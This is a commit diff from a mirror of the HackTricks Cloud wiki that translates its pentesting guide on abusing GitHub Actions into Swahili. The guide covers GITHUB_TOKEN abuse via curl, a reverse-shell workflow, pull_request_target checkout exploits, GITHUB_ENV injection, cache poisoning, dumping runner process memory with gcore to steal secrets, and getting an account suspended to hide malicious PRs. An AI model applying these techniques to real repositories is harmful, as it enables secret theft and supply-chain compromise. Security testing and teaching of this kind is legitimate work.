gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-02-04 11:07:37 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/banners/hacktricks-training.md', 'src/pentesting-ci-cd/

Browse Source
This commit is contained in:
Translator
2025-01-02 01:22:11 +00:00
parent 5a62f6b0a3
commit b43d62ebcb
237 changed files with 2953 additions and 2957 deletions
Download Patch File Download Diff File Expand all files Collapse all files

174
src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
View File

@@ -4,45 +4,45 @@
## Basic Information
In this page you will find:
Katika ukurasa huu utaona:
- A **summary of all the impacts** of an attacker managing to access a Github Action
- Different ways to **get access to an action**:
- Having **permissions** to create the action
- Abusing **pull request** related triggers
- Abusing **other external access** techniques
- **Pivoting** from an already compromised repo
- Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts)
- **Muhtasari wa athari zote** za mshambuliaji kufanikiwa kupata ufikiaji wa Github Action
- Njia tofauti za **kupata ufikiaji wa hatua**:
- Kuwa na **idhini** za kuunda hatua hiyo
- Kutumia **vichocheo** vinavyohusiana na ombi la kuvuta
- Kutumia **mbinu nyingine za ufikiaji wa nje**
- **Pivoting** kutoka kwenye repo iliyoshambuliwa tayari
- Hatimaye, sehemu kuhusu **mbinu za baada ya unyakuzi kutumia hatua kutoka ndani** (kwa sababu ya athari zilizotajwa)
## Impacts Summary
For an introduction about [**Github Actions check the basic information**](../basic-github-information.md#github-actions).
Kwa utangulizi kuhusu [**Github Actions angalia taarifa za msingi**](../basic-github-information.md#github-actions).
If you can **execute arbitrary code in GitHub Actions** within a **repository**, you may be able to:
Ikiwa unaweza **kutekeleza msimbo wowote katika GitHub Actions** ndani ya **repo**, unaweza kuwa na uwezo wa:
- **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP.
- **Compromise deployments** and other **artifacts**.
- If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack.
- **Execute code in custom workers** to abuse computing power and pivot to other systems.
- **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`.
- **Kuhujumu siri** zilizowekwa kwenye pipeline na **kutumia mamlaka ya pipeline** kupata ufikiaji usioidhinishwa kwenye majukwaa ya nje, kama AWS na GCP.
- **Kuhujumu matumizi** na **vitu vingine**.
- Ikiwa pipeline inapeleka au kuhifadhi mali, unaweza kubadilisha bidhaa ya mwisho, kuwezesha shambulio la mnyororo wa usambazaji.
- **Kutekeleza msimbo katika wafanyakazi maalum** ili kutumia nguvu za kompyuta na pivot kwa mifumo mingine.
- **Kufuta msimbo wa repo**, kulingana na ruhusa zinazohusiana na `GITHUB_TOKEN`.
## GITHUB_TOKEN
This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given when the admin enables this option:
Hii "**siri**" (inayotoka `${{ secrets.GITHUB_TOKEN }}` na `${{ github.token }}`) inatolewa wakati msimamizi anapowezesha chaguo hili:
<figure><img src="../../../images/image (86).png" alt=""><figcaption></figcaption></figure>
This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
Token hii ni sawa na ile ambayo **Github Application itatumia**, hivyo inaweza kufikia mwisho sawa: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
> [!WARNING]
> Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`.
> Github inapaswa kutoa [**mchakato**](https://github.com/github/roadmap/issues/74) ambao **unaruhusu ufikiaji wa kuvuka-repo** ndani ya GitHub, ili repo iweze kufikia repo nyingine za ndani kwa kutumia `GITHUB_TOKEN`.
You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
Unaweza kuona **idhini** zinazowezekana za token hii katika: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
Note that the token **expires after the job has completed**.\
These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7`
Kumbuka kwamba token **inaisha muda baada ya kazi kukamilika**.\
Token hizi zinaonekana kama hii: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7`
Some interesting things you can do with this token:
Mambo kadhaa ya kuvutia unayoweza kufanya na token hii:
{{#tabs }}
{{#tab name="Merge PR" }}
@@ -67,7 +67,7 @@ https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/reviews \
-d '{"event":"APPROVE"}'
```
{{#endtab }}
{{#tab name="Unda PR" }}
{{#tab name="Create PR" }}
```bash
# Create a PR
curl -X POST \
@@ -111,7 +111,7 @@ secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
<details>
<summary>Pata shell ya kinyume na siri</summary>
<summary>Pata shell ya kurudi na siri</summary>
```yaml
name: revshell
on:
@@ -141,19 +141,19 @@ Inawezekana kuangalia ruhusa zilizotolewa kwa Github Token katika hifadhi za wat
## Utekelezaji Ulioidhinishwa
> [!NOTE]
> Hii ingekuwa njia rahisi zaidi ya kuathiri vitendo vya Github, kwani kesi hii inadhani kuwa una uf access **kuunda hifadhi mpya katika shirika**, au una **haki za kuandika juu ya hifadhi**.
> Hii ingekuwa njia rahisi zaidi ya kuathiri vitendo vya Github, kwani kesi hii inadhani kuwa una ufikiaji wa **kuunda hifadhi mpya katika shirika**, au una **haki za kuandika juu ya hifadhi**.
>
> Ikiwa uko katika hali hii unaweza tu kuangalia [Mbinu za Baada ya Utekelezaji](./#post-exploitation-techniques-from-inside-an-action).
> Ikiwa uko katika hali hii unaweza tu kuangalia [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action).
### Utekelezaji Kutoka kwa Uundaji wa Hifadhi
### Utekelezaji kutoka kwa Uundaji wa Hifadhi
Katika kesi ambapo wanachama wa shirika wanaweza **kuunda hifadhi mpya** na unaweza kutekeleza vitendo vya github, unaweza **kuunda hifadhi mpya na kuiba siri zilizowekwa katika kiwango cha shirika**.
### Utekelezaji Kutoka kwa Tawi Jipya
### Utekelezaji kutoka kwa Tawi Jipya
Ikiwa unaweza **kuunda tawi jipya katika hifadhi ambayo tayari ina Github Action** iliyowekwa, unaweza **kubadilisha** hiyo, **kupakia** maudhui, na kisha **kutekeleza kitendo hicho kutoka kwa tawi jipya**. Kwa njia hii unaweza **kuondoa siri za hifadhi na kiwango cha shirika** (lakini unahitaji kujua zinaitwaje).
Unaweza kufanya kitendo kilichobadilishwa kiwe cha kutekelezeka **kwa mikono,** wakati **PR inaundwa** au wakati **kodi fulani inasukumwa** (kulingana na jinsi unavyotaka kuwa na sauti):
Unaweza kufanya kitendo kilichobadilishwa kiwe cha kutekelezeka **kwa mikono,** wakati **PR inaundwa** au wakati **kodi fulani inasukumwa** (kulingana na jinsi unavyotaka kuwa na kelele):
```yaml
on:
workflow_dispatch: # Launch manually
@@ -174,18 +174,18 @@ branches:
### `pull_request`
Vichocheo vya kazi **`pull_request`** vitatekeleza kazi kila wakati ombi la kuvuta linapopokelewa na baadhi ya visingizio: kwa kawaida ikiwa ni **mara ya kwanza** unapo **shirikiana**, baadhi ya **wasimamizi** watahitaji **kuthibitisha** **kuendesha** kazi hiyo:
Vichocheo vya workflow **`pull_request`** vitatekeleza workflow kila wakati ombi la kuvuta linapopokelewa na baadhi ya visingizio: kwa kawaida ikiwa ni **mara ya kwanza** unapo **shirikiana**, baadhi ya **wasimamizi** watahitaji **kuthibitisha** **kuendesha** workflow:
<figure><img src="../../../images/image (184).png" alt=""><figcaption></figcaption></figure>
> [!NOTE]
> Kwa kuwa **kikomo cha kawaida** ni kwa **watoaji wa mara ya kwanza**, unaweza kuchangia **kurekebisha hitilafu/typo halali** na kisha kutuma **PR nyingine ili kutumia haki zako mpya za `pull_request`**.
> Kwa kuwa **kikomo cha kawaida** ni kwa **watoaji wa mara ya kwanza**, unaweza kuchangia **kurekebisha hitilafu halali/typo** na kisha kutuma **PR nyingine ili kutumia haki zako mpya za `pull_request`**.
>
> **Nilijaribu hii na haifanyi kazi**: ~~Chaguo lingine lingekuwa kuunda akaunti kwa jina la mtu ambaye alichangia kwenye mradi na kufuta akaunti yake.~~
> **Nimejaribu hii na haifanyi kazi**: ~~Chaguo lingine lingekuwa kuunda akaunti kwa jina la mtu ambaye alichangia kwenye mradi na kufuta akaunti yake.~~
Zaidi ya hayo, kwa kawaida **inazuia ruhusa za kuandika** na **ufikiaji wa siri** kwa hifadhi lengwa kama ilivyoelezwa katika [**nyaraka**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
Zaidi ya hayo, kwa kawaida **inazuia ruhusa za kuandika** na **ufikiaji wa siri** kwa hifadhi lengwa kama ilivyoelezwa katika [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
> Kwa kutengwa kwa `GITHUB_TOKEN`, **siri hazipitishwi kwa mchezaji** wakati kazi inachochewa kutoka hifadhi **forked**. **`GITHUB_TOKEN` ina ruhusa za kusoma tu** katika ombi la kuvuta **kutoka hifadhi za forked**.
> Kwa kutengwa kwa `GITHUB_TOKEN`, **siri hazipitishwi kwa mchezaji** wakati workflow inachochewa kutoka hifadhi **forked**. **`GITHUB_TOKEN` ina ruhusa za kusoma tu** katika maombi ya kuvuta **kutoka hifadhi za forked**.
Mshambuliaji anaweza kubadilisha ufafanuzi wa Github Action ili kutekeleza mambo yasiyo na mipaka na kuongeza vitendo vya kiholela. Hata hivyo, hataweza kuiba siri au kufuta repo kwa sababu ya vikwazo vilivyotajwa.
@@ -196,20 +196,20 @@ Kwa kuwa mshambuliaji pia anadhibiti msimbo unaotekelezwa, hata kama hakuna siri
### **`pull_request_target`**
Vichocheo vya kazi **`pull_request_target`** vina **ruhusa za kuandika** kwa hifadhi lengwa na **ufikiaji wa siri** (na havihitaji ruhusa).
Vichocheo vya workflow **`pull_request_target`** vina **ruhusa za kuandika** kwa hifadhi lengwa na **ufikiaji wa siri** (na havihitaji ruhusa).
Kumbuka kwamba vichocheo vya kazi **`pull_request_target`** **vinakimbia katika muktadha wa msingi** na si katika ile iliyotolewa na PR (ili **kutoendesha msimbo usioaminika**). Kwa maelezo zaidi kuhusu `pull_request_target` [**angalia nyaraka**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
Zaidi ya hayo, kwa maelezo zaidi kuhusu matumizi haya hatari maalum angalia hii [**blogu ya github**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
Kumbuka kwamba vichocheo vya workflow **`pull_request_target`** **vinakimbia katika muktadha wa msingi** na si katika ule unaotolewa na PR (ili **kutoendesha msimbo usioaminika**). Kwa maelezo zaidi kuhusu `pull_request_target` [**angalia docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
Zaidi ya hayo, kwa maelezo zaidi kuhusu matumizi haya hatari maalum angalia [**blogu ya github**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
Inaweza kuonekana kuwa kwa sababu **kazi inayotekelezwa** ni ile iliyofafanuliwa katika **msingi** na **siyo katika PR** ni **salama** kutumia **`pull_request_target`**, lakini kuna **mifano michache ambapo si salama**.
Inaweza kuonekana kuwa kwa sababu **workflow inayotekelezwa** ni ile iliyoainishwa katika **msingi** na **siyo katika PR** ni **salama** kutumia **`pull_request_target`**, lakini kuna **mambo machache ambapo si salama**.
Na hii itakuwa na **ufikiaji wa siri**.
### `workflow_run`
Vichocheo vya [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) vinaruhusu kuendesha kazi kutoka nyingine wakati imekamilika, imeombwa au inaendelea.
Vichocheo vya [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) vinaruhusu kuendesha workflow kutoka nyingine wakati imekamilika, imeombwa au inaendelea.
Katika mfano huu, kazi imewekwa ili kuendesha baada ya kazi tofauti "Run Tests" kukamilika:
Katika mfano huu, workflow imepangwa kuendesha baada ya workflow tofauti "Run Tests" kukamilika:
```yaml
on:
workflow_run:
@@ -217,31 +217,31 @@ workflows: [Run Tests]
types:
- completed
```
Moreover, according to the docs: The workflow started by the `workflow_run` event is able to **access secrets and write tokens, even if the previous workflow was not**.
Zaidi ya hayo, kulingana na nyaraka: Mchakato ulioanzishwa na tukio la `workflow_run` unaweza **kupata siri na kuandika tokeni, hata kama mchakato wa awali haukuwa**.
This kind of workflow could be attacked if it's **depending** on a **workflow** that can be **triggered** by an external user via **`pull_request`** or **`pull_request_target`**. A couple of vulnerable examples can be [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** The first one consist on the **`workflow_run`** triggered workflow downloading out the attackers code: `${{ github.event.pull_request.head.sha }}`\
The second one consist on **passing** an **artifact** from the **untrusted** code to the **`workflow_run`** workflow and using the content of this artifact in a way that makes it **vulnerable to RCE**.
Aina hii ya mchakato inaweza kushambuliwa ikiwa inategemea **mchakato** ambao unaweza **kuanzishwa** na mtumiaji wa nje kupitia **`pull_request`** au **`pull_request_target`**. Mifano kadhaa za hatari zinaweza [**kupatikana kwenye blogu hii**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** Ya kwanza inahusisha **`workflow_run`** iliyoanzishwa ikipakua msimbo wa washambuliaji: `${{ github.event.pull_request.head.sha }}`\
Ya pili inahusisha **kupitisha** **artifact** kutoka kwa msimbo **usioaminika** hadi kwenye mchakato wa **`workflow_run`** na kutumia maudhui ya artifact hii kwa njia inayofanya iwe **hatari kwa RCE**.
### `workflow_call`
TODO
TODO: Check if when executed from a pull_request the used/downloaded code if the one from the origin or from the forked PR
TODO: Angalia ikiwa wakati inatekelezwa kutoka kwa pull_request msimbo ulio tumika/pakuliwa ni ule kutoka kwa asili au kutoka kwa PR iliyofanywa.
## Abusing Forked Execution
## Kutumia Utekelezaji wa Forked
We have mentioned all the ways an external attacker could manage to make a github workflow to execute, now let's take a look about how this executions, if bad configured, could be abused:
Tumetaja njia zote ambazo mshambuliaji wa nje anaweza kuweza kufanya mchakato wa github kutekelezwa, sasa hebu tuangalie jinsi utekelezaji huu, ikiwa umewekwa vibaya, unaweza kutumiwa vibaya:
### Untrusted checkout execution
### Utekelezaji wa untrusted checkout
In the case of **`pull_request`,** the workflow is going to be executed in the **context of the PR** (so it'll execute the **malicious PRs code**), but someone needs to **authorize it first** and it will run with some [limitations](./#pull_request).
Katika kesi ya **`pull_request`,** mchakato utaanzishwa katika **muktadha wa PR** (hivyo utaanzisha **msimbo wa PR mbaya**), lakini mtu anahitaji **kuidhinisha kwanza** na utaendesha kwa baadhi ya [mipaka](./#pull_request).
In case of a workflow using **`pull_request_target` or `workflow_run`** that depends on a workflow that can be triggered from **`pull_request_target` or `pull_request`** the code from the original repo will be executed, so the **attacker cannot control the executed code**.
Katika kesi ya mchakato unaotumia **`pull_request_target` au `workflow_run`** inayotegemea mchakato ambao unaweza kuanzishwa kutoka **`pull_request_target` au `pull_request`** msimbo kutoka kwa repo ya asili utaanzishwa, hivyo **mshambuliaji hawezi kudhibiti msimbo unaotekelezwa**.
> [!CAUTION]
> However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded):
> Hata hivyo, ikiwa **action** ina **ukaguzi wa PR wazi** ambao uta **pata msimbo kutoka kwa PR** (na sio kutoka msingi), itatumia msimbo ulio chini ya udhibiti wa mshambuliaji. Kwa mfano (angalia mstari wa 12 ambapo msimbo wa PR unapakuliwa):
<pre class="language-yaml"><code class="lang-yaml"># INSECURE. Provided as an example only.
<pre class="language-yaml"><code class="lang-yaml"># INSECURE. Imepewa kama mfano tu.
on:
pull_request_target
@@ -269,14 +269,14 @@ message: |
Thank you!
</code></pre>
The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**.
Msimbo unaoweza kuwa **usioaminika unatekelezwa wakati wa `npm install` au `npm build`** kwani skripti za kujenga na **pakiti** zinazohusishwa zinadhibitiwa na mwandishi wa PR.
> [!WARNING]
> A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR).
> Dork ya github kutafuta vitendo vyenye hatari ni: `event.pull_request pull_request_target extension:yml` hata hivyo, kuna njia tofauti za kuweka kazi zinazoweza kutekelezwa kwa usalama hata kama action imewekwa kwa njia isiyo salama (kama kutumia masharti kuhusu nani ni mchezaji anayezalisha PR).
### Context Script Injections <a href="#understanding-the-risk-of-script-injections" id="understanding-the-risk-of-script-injections"></a>
### Makinikia ya Muktadha wa Script <a href="#understanding-the-risk-of-script-injections" id="understanding-the-risk-of-script-injections"></a>
Note that there are certain [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) whose values are **controlled** by the **user** creating the PR. If the github action is using that **data to execute anything**, it could lead to **arbitrary code execution:**
Kumbuka kuwa kuna baadhi ya [**muktadha ya github**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) ambao thamani zao zina **dhibitiwa** na **mtumiaji** anayezalisha PR. Ikiwa action ya github inatumia hiyo **data kutekeleza chochote**, inaweza kusababisha **utekelezaji wa msimbo wa kiholela:**
{{#ref}}
gh-actions-context-script-injections.md
@@ -284,23 +284,23 @@ gh-actions-context-script-injections.md
### **GITHUB_ENV Script Injection** <a href="#what-is-usdgithub_env" id="what-is-usdgithub_env"></a>
From the docs: You can make an **environment variable available to any subsequent steps** in a workflow job by defining or updating the environment variable and writing this to the **`GITHUB_ENV`** environment file.
Kutoka kwenye nyaraka: Unaweza kufanya **kigezo cha mazingira kiweze kupatikana kwa hatua zozote zinazofuata** katika kazi ya mchakato kwa kufafanua au kuboresha kigezo cha mazingira na kuandika hii kwenye faili ya mazingira ya **`GITHUB_ENV`**.
If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD_PRELOAD** or **NODE_OPTIONS**.
Ikiwa mshambuliaji anaweza **kuchanganya thamani yoyote** ndani ya hii **env** kigezo, anaweza kuchanganya vigezo vya env ambavyo vinaweza kutekeleza msimbo katika hatua zinazofuata kama **LD_PRELOAD** au **NODE_OPTIONS**.
For example ([**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) and [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), imagine a workflow that is trusting an uploaded artifact to store its content inside **`GITHUB_ENV`** env variable. An attacker could upload something like this to compromise it:
Kwa mfano ([**hii**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) na [**hii**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), fikiria mchakato ambao unategemea artifact iliyopakiwa kuhifadhi maudhui yake ndani ya **`GITHUB_ENV`** kigezo. Mshambuliaji anaweza kupakia kitu kama hiki ili kukiharibu:
<figure><img src="../../../images/image (261).png" alt=""><figcaption></figcaption></figure>
### Vulnerable Third Party Github Actions
### Vitendo vya Github vya Tatu vya Hatari
#### [dawidd6/action-download-artifact](https://github.com/dawidd6/action-download-artifact)
As mentioned in [**this blog post**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), this Github Action allows to access artifacts from different workflows and even repositories.
Kama ilivyotajwa katika [**hiki kipande cha blogu**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), hii Github Action inaruhusu kufikia artifacts kutoka kwa michakato tofauti na hata hifadhi.
The thing problem is that if the **`path`** parameter isn't set, the artifact is extracted in the current directory and it can override files that could be later used or even executed in the workflow. Therefore, if the Artifact is vulnerable, an attacker could abuse this to compromise other workflows trusting the Artifact.
Tatizo kubwa ni kwamba ikiwa **`path`** parameter haijawekwa, artifact inachukuliwa katika saraka ya sasa na inaweza kubadilisha faili ambazo zinaweza kutumika baadaye au hata kutekelezwa katika mchakato. Kwa hivyo, ikiwa Artifact ina hatari, mshambuliaji anaweza kutumia hii kuathiri michakato mingine inayotegemea Artifact.
Example of vulnerable workflow:
Mfano wa mchakato wa hatari:
```yaml
on:
workflow_run:
@@ -340,27 +340,27 @@ path: ./script.py
```
---
## Mtu Mwingine wa Nje
## Mipango Mingine ya Nje
### Utekaji wa Repo ya Namespace Iliyofutwa
### Utekwaji wa Repo ya Namespace Iliyofutwa
Ikiwa akaunti inabadilisha jina lake, mtumiaji mwingine anaweza kujiandikisha na akaunti yenye jina hilo baada ya muda fulani. Ikiwa repo ilikuwa na **nyota chini ya 100 kabla ya kubadilisha jina**, Github itaruhusu mtumiaji mpya aliyejiandikisha kwa jina hilo kuunda **repo yenye jina sawa** na ile iliyofutwa.
Ikiwa akaunti inabadilisha jina lake, mtumiaji mwingine anaweza kujiandikisha na akaunti yenye jina hilo baada ya muda fulani. Ikiwa hazina ilikuwa na **nyota chini ya 100 kabla ya kubadilisha jina**, Github itaruhusu mtumiaji mpya aliyejiandikisha kwa jina hilo kuunda **hazina yenye jina sawa** na ile iliyofutwa.
> [!CAUTION]
> Hivyo basi ikiwa hatua inatumia repo kutoka kwa akaunti isiyokuwepo, bado inawezekana kwamba mshambuliaji anaweza kuunda akaunti hiyo na kuathiri hatua hiyo.
> Hivyo basi ikiwa hatua inatumia hazina kutoka kwa akaunti isiyokuwepo, bado inawezekana kwamba mshambuliaji anaweza kuunda akaunti hiyo na kuathiri hatua hiyo.
Ikiwa repo nyingine zilikuwa zikitumika **kutegemea kutoka kwa repo za mtumiaji huyu**, mshambuliaji ataweza kuzikamata. Hapa kuna maelezo kamili zaidi: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
Ikiwa hazina nyingine zilikuwa zikitumika **kutegemea kutoka kwa hazina za mtumiaji huyu**, mshambuliaji ataweza kuziiba. Hapa kuna maelezo kamili zaidi: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
---
## Uhamasishaji wa Repo
## Mabadiliko ya Repo
> [!NOTE]
> Katika sehemu hii tutazungumzia mbinu ambazo zitaruhusu **kuhamasisha kutoka repo moja hadi nyingine** tukidhani tuna aina fulani ya ufikiaji kwenye ya kwanza (angalia sehemu iliyopita).
### Upoison wa Cache
Cache inatunzwa kati ya **mizunguko ya workflow katika tawi moja**. Hii ina maana kwamba ikiwa mshambuliaji **anaathiri** **kifurushi** ambacho kisha kinahifadhiwa kwenye cache na **kupakuliwa** na kutekelezwa na **workflow yenye mamlaka zaidi**, ataweza pia **kuathiri** workflow hiyo.
Cache inashikiliwa kati ya **mizunguko ya workflow katika tawi moja**. Hii ina maana kwamba ikiwa mshambuliaji **ataathiri** **pakiti** ambayo kisha inahifadhiwa kwenye cache na **kupakuliwa** na kutekelezwa na **workflow yenye mamlaka zaidi**, ataweza pia **kuathiri** workflow hiyo.
{{#ref}}
gh-actions-cache-poisoning.md
@@ -368,7 +368,7 @@ gh-actions-cache-poisoning.md
### Upoison wa Kazi
Workflows zinaweza kutumia **kazi kutoka kwa workflows nyingine na hata repos**, ikiwa mshambuliaji anafanikiwa **kuathiri** Github Action inayopakia **kazi** ambayo baadaye inatumika na workflow nyingine, anaweza **kuathiri workflows nyingine**:
Workflows zinaweza kutumia **kazi kutoka kwa workflows nyingine na hata hazina**, ikiwa mshambuliaji anafanikiwa **kuathiri** Github Action inay **pakia kazi** ambayo baadaye inatumika na workflow nyingine, anaweza **kuathiri workflows nyingine**:
{{#ref}}
gh-actions-artifact-poisoning.md
@@ -376,7 +376,7 @@ gh-actions-artifact-poisoning.md
---
## Baada ya Kutekeleza kutoka kwa Hatua
## Baada ya Utekelezaji kutoka kwa Hatua
### Kufikia AWS na GCP kupitia OIDC
@@ -392,7 +392,7 @@ Angalia kurasa zifuatazo:
### Kufikia siri <a href="#accessing-secrets" id="accessing-secrets"></a>
Ikiwa unachanganya maudhui kwenye script, ni muhimu kujua jinsi unavyoweza kufikia siri:
Ikiwa unachoma maudhui kwenye script, ni muhimu kujua jinsi ya kufikia siri:
- Ikiwa siri au token imewekwa kwenye **kigezo cha mazingira**, inaweza kufikiwa moja kwa moja kupitia mazingira kwa kutumia **`printenv`**.
@@ -425,7 +425,7 @@ secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
<details>
<summary>Pata shell ya kinyume na siri</summary>
<summary>Pata shell ya kurudi na siri</summary>
```yaml
name: revshell
on:
@@ -466,7 +466,7 @@ key: ${{ secrets.PUBLISH_KEY }}
### Kutumia Runners za Kujihudumia
Njia ya kupata ni zipi **Github Actions zinafanywa katika miundombinu isiyo ya github** ni kutafuta **`runs-on: self-hosted`** katika usanidi wa yaml wa Github Action.
Njia ya kutafuta ni zipi **Github Actions zinazotekelezwa katika miundombinu isiyo ya github** ni kutafuta **`runs-on: self-hosted`** katika usanidi wa yaml wa Github Action.
**Runners za kujihudumia** zinaweza kuwa na ufikiaji wa **habari nyeti zaidi**, kwa mifumo mingine ya **mtandao** (nukta dhaifu katika mtandao? huduma ya metadata?) au, hata kama imejitengea na kuharibiwa, **hatua zaidi ya moja zinaweza kufanywa kwa wakati mmoja** na ile mbaya inaweza **kuiba siri** za nyingine.
@@ -475,12 +475,12 @@ Katika runners za kujihudumia pia inawezekana kupata **siri kutoka kwa \_Runner.
sudo apt-get install -y gdb
sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')"
```
Check [**hii posti kwa maelezo zaidi**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
Angalia [**post hii kwa maelezo zaidi**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
### Github Docker Images Registry
Inawezekana kuunda Github actions ambazo **zitajenga na kuhifadhi picha ya Docker ndani ya Github**.\
Mfano unaweza kupatikana katika ifuatayo inayoweza kupanuliwa:
Mfano unaweza kupatikana katika yafuatayo yanayoweza kupanuliwa:
<details>
@@ -515,35 +515,35 @@ ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ e
```
</details>
Kama unavyoona katika msimbo uliopita, usajili wa Github unahifadhiwa katika **`ghcr.io`**.
Kama unavyoona katika msimbo wa awali, usajili wa Github unahifadhiwa katika **`ghcr.io`**.
Mtumiaji mwenye ruhusa za kusoma juu ya repo basi ataweza kupakua Picha ya Docker akitumia tokeni ya ufikiaji wa kibinafsi:
Mtumiaji mwenye ruhusa za kusoma juu ya repo ataweza kupakua Picha ya Docker kwa kutumia tokeni ya ufikiaji wa kibinafsi:
```bash
echo $gh_token | docker login ghcr.io -u <username> --password-stdin
docker pull ghcr.io/<org-name>/<repo_name>:<tag>
```
Then, the user could search for **leaked secrets in the Docker image layers:**
Kisha, mtumiaji anaweza kutafuta **siri zilizovuja katika tabaka za picha za Docker:**
{{#ref}}
https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics
{{#endref}}
### Sensitive info in Github Actions logs
### Taarifa nyeti katika kumbukumbu za Github Actions
Hata kama **Github** inajaribu **kubaini thamani za siri** katika rekodi za hatua na **kuepuka kuonyesha** hizo, **data nyeti nyingine** ambazo zinaweza kuwa zimeundwa katika utekelezaji wa hatua hiyo hazitafichwa. Kwa mfano, JWT iliyosainiwa kwa thamani ya siri haitafichwa isipokuwa [imewekwa maalum](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
Hata kama **Github** inajaribu **kubaini thamani za siri** katika kumbukumbu za hatua na **kuepuka kuonyesha** hizo, **data nyeti nyingine** ambazo zinaweza kuwa zimeundwa katika utekelezaji wa hatua hiyo hazitafichwa. Kwa mfano, JWT iliyosainiwa kwa thamani ya siri haitafichwa isipokuwa [imewekwa maalum](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
## Covering your Tracks
## Kufunika Nyayo Zako
(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) Kwanza kabisa, PR yoyote iliyoinuliwa inaonekana wazi kwa umma katika Github na kwa akaunti ya lengo ya GitHub. Katika GitHub kwa kawaida, **hatuwezi kufuta PR ya mtandao**, lakini kuna mabadiliko. Kwa akaunti za Github ambazo zime **simamishwa** na Github, **PR zao zote zinafuta moja kwa moja** na kuondolewa kutoka mtandao. Hivyo ili kuficha shughuli zako unahitaji ama kupata **akaunti yako ya GitHub isimamishwe au kupata akaunti yako iwe na alama**. Hii it **ficha shughuli zako zote** kwenye GitHub kutoka mtandao (kimsingi kuondoa PR zako zote za unyakuzi)
